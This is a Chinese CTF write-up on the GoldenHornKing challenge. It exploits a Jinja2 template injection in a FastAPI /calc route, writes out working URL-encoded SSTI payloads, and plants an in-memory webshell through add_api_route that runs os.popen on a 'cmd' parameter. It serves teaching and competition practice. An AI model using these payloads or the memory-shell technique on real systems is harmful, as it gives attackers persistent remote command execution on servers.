这个比赛也是结束了很长时间了,反思一下为什么现在才复现, 以前也看过wp,但是也就看了一眼

还有很多打的比赛都没有复现。。。

想起来这个比赛的复现还是在公众号上看到了一个FlaskAPI内存马的研究,点进去看了一眼没想到就是巅峰极客的那个题

GoldenHornKing

当时在打比赛的时候,在暑假我们一起打的,下午的时候队友发了一个payload让我试,但是没有成功

这道题是不出网,所以我们只能用写入内存马的形式

首先我们看一下源码

import os
import jinja2
import functools
import uvicorn
from fastapi import FastAPI
from fastapi.templating import Jinja2Templates
from anyio import fail_after


# Decorator to add a timeout to async functions
def timeout_after(timeout: int = 1):
    def decorator(func):
        @functools.wraps(func)
        async def wrapper(*args, **kwargs):
            with fail_after(timeout):
                return await func(*args, **kwargs)
        return wrapper
    return decorator

# Initialize FastAPI app
app = FastAPI()
access = False

# Set up Jinja2 template directory
_base_path = os.path.dirname(os.path.abspath(__file__))
t = Jinja2Templates(directory=_base_path)

@app.get("/")
@timeout_after(1)
async def index():
    # Read and return the content of the current file
    return open(__file__, 'r').read()

@app.get("/calc")
@timeout_after(1)
async def ssti(calc_req: str ):
    global access
    if (any(char.isdigit() for char in calc_req)) or ("%" in calc_req) or not calc_req.isascii() or access:
        return "bad char"
    else:
        print(calc_req)
        template = jinja2.Environment(loader=jinja2.BaseLoader()).from_string(f"{{{{ {calc_req} }}}}")
        rendered_template = template.render({"app": app})
        return rendered_template
    return "fight"
# Run the application with Uvicorn server
if __name__ == "__main__":
    uvicorn.run(app, host="0.0.0.0", port=8080)

这里的关键路由就是这个calc路由存在ssti模板注入

我们观察一下

@app.get("/calc")
@timeout_after(1)
async def ssti(calc_req: str ):
    global access
    if (any(char.isdigit() for char in calc_req)) or ("%" in calc_req) or not calc_req.isascii() or access:
        return "bad char"
    else:
        print(calc_req)
        template = jinja2.Environment(loader=jinja2.BaseLoader()).from_string(f"{{{{ {calc_req} }}}}")
        rendered_template = template.render({"app": app})
        return rendered_template
    return "fight"

这里的过滤是不能有数字,不能出现%,也不能全是ascll字符,最后这里的access,就是如果成功绕过waf,就为true

我们就得重开容器,而且还是没有回显的,经过测试不出网

这里的话我们就是在本地搭建一个环境先测试一下ssti能不能命令执行,把这个access这个限制先去了

输出一下

@app.get("/calc")
@timeout_after(1)
async def ssti(calc_req: str ):
    if (any(char.isdigit() for char in calc_req)) or ("%" in calc_req) or not calc_req.isascii():
        return "bad char"
    else:
        print(calc_req)
        template = jinja2.Environment(loader=jinja2.BaseLoader()).from_string(f"{{{{ {calc_req} }}}}")
        rendered_template = template.render({"app": app})
        return rendered_template

这里的话我们用hackbar自带的payload就能打通

这里的难点就是环境是没有回显的,而且不出网,我们没有办法进行反弹shell或者是curl外带

就只有写入内存马了

关于python的内存马我没有了解多少

其中不同版本的内存马的写法都不一样,这里的大致思路就是来写入一个路由,里面是我们的马

网上比较多的是flask内存马,通过add_url_rule来添加路由,但是现在的flask的版本太高了,很多都不支持add_url_rule

来添加路由,这里的话是FastAPI,这里更不能用了

在FastAPI中,我们可以找到这几个相关的增加路由的方法

我们用这个add_api_route可以增加路由

接下来我们有了路由操作之后,我们要获取到这个app的实例对象

sys.modules是一个全局字典,该字典是python启动后就加载在内存中。每当程序员导入新的模块,sys.modules都将记录这些模块。字典sys.modules对于加载模块起到了缓冲的作用。当某个模块第一次导入,字典sys.modules将自动记录该模块。当第二次再导入该模块时,python会直接到字典中查找,从而加快了程序运行的速度。

所以我们可以通过sys.modules拿到当前已经导入的模块,并且获取模块中的属性,由于我们最终的eval是在app.py中执行的,所以我们可以通过sys.modules['__main__']来获取当前的模块

sys.modules['__main__'].__dict__['app']

内存马

import sys

app = sys.modules['__main__'].__dict__['app']
from fastapi import Request
def a(request: Request):
    import os
    cmd = request.query_params.get('cmd')
    if cmd is not None:
        app.add_api_route('/a',a, methods=['GET'])

将这个进行写入到我们的sstipayload里面

/calc?calc_req=lipsum.__globals__.__builtins__['exec']("import+sys\napp+%3d+sys.modules['__main__'].__dict__['app']\nfrom+fastapi+import+Request\n\ndef+a(request%3a+Request)%3a\n++++import+os\n++++cmd+%3d+request.query_params.get('cmd')\n++++if+cmd+is+not+None%3a\n++++++++print(f'Command+received%3a+{cmd}')\n++++++++return+os.popen(cmd).read()\n++++\n++++return+'shell'\n\napp.add_api_route('/a',+a,+methods%3d['GET'])")

第二种写法就是通过匿名函数来写

/calc?calc_req=undefinded.__class__.__init__.__globals__['__builtins__'].eval("__import__('sys').modules['__main__'].__dict__['app'].add_api_route('/flag',lambda:__import__('os').popen('cat /flag').read())")

这里的话还是用这个add.api.route只不过这里面函数变成了匿名函数了